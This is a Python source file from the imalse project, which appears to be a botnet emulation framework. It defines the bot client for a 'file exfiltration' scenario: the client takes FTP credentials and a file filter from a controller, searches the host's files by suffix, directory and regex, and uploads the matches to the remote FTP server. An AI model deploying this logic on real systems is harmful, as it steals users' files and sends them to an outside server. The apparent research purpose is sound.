Source

imalse / scenario / file_exfiltration / client_cmd.py

"""

This file contains the Client Command Meta Description for the file
exfiltration scenario.

"""

import re

from core.real.node import PhysicalNode
from core.nodes.client import ClientCMD as CCMD
from scenario.file_exfiltration.config import Client as ClientDescription

MAX_NUM = 100

class ClientCMD(CCMD):
    
    """This class is a subclass of ClientCMD."""
    
    def __init__(self, desc=None):
        """Initialize."""
        if desc == None:
            desc = ClientDescription()
        CCMD.__init__(self, desc)
        self.ftp_info = None
        self.file_filter = None
        
    def set_ftp_info(self, sock, data):
        """Set the ftp info that the client will upload the data to."""
        self.logger.debug('set_ftp_info, receive data, %s'%(data))
        self.ftp_info = data

    def set_file_filter(self, sock, data):
        """Set the filter which will be used to search for files."""
        self.logger.debug('set_file_filter, receive data, %s'%(data))
        self.file_filter = data

    def search_and_upload(self, sock, data):
        """Search the usable files and upload them to a ftp server."""
        interesting_files = self.search_files()
        if not interesting_files:
            self.logger.info('no interesting files have been found')
            return
        for i_file in interesting_files:
            self.upload_file(i_file)

    def search_files(self):
        """Search files in the machine with possible string pattern."""
        if self.file_filter == None:
            return []
        
        suffix = self.file_filter.suffix
        directory = self.file_filter.directory
        pattern = self.file_filter.pattern
        
        f_list = self.node.get_file_list(MAX_NUM, suffix, directory)
        print 'file_list', f_list
        interesting_files = [f for f in f_list if self.check_file(f, pattern)]
        print 'interesting_files', interesting_files
        return interesting_files

    def check_file(self, c_file, pattern):
        """Check whether a file matches the pattern."""
        f_content = self.node.load_file(c_file)
        return True if re.search(pattern, f_content) else False

    def upload_file(self, u_file):
        """Upload a file to the ftp server"""
        self.node.ftp_upload(u_file, self.ftp_info.hostname, self.ftp_info.user,\
                             self.ftp_info.password)

if __name__ == "__main__":
    cmd = ClientCMD(ClientDescription())
    node = PhysicalNode()
    cmd.install(node)
    # node.start()
    #cmd.search_files()
Tip: Filter by directory path e.g. /media app.js to search for public/media/app.js.
Tip: Use camelCasing e.g. ProjME to search for ProjectModifiedEvent.java.
Tip: Filter by extension type e.g. /repo .js to search for all .js files in the /repo directory.
Tip: Separate your search with spaces e.g. /ssh pom.xml to search for src/ssh/pom.xml.
Tip: Use ↑ and ↓ arrow keys to navigate and return to view the file.
Tip: You can also navigate files with Ctrl+j (next) and Ctrl+k (previous) and view the file with Ctrl+o.
Tip: You can also navigate files with Alt+j (next) and Alt+k (previous) and view the file with Alt+o.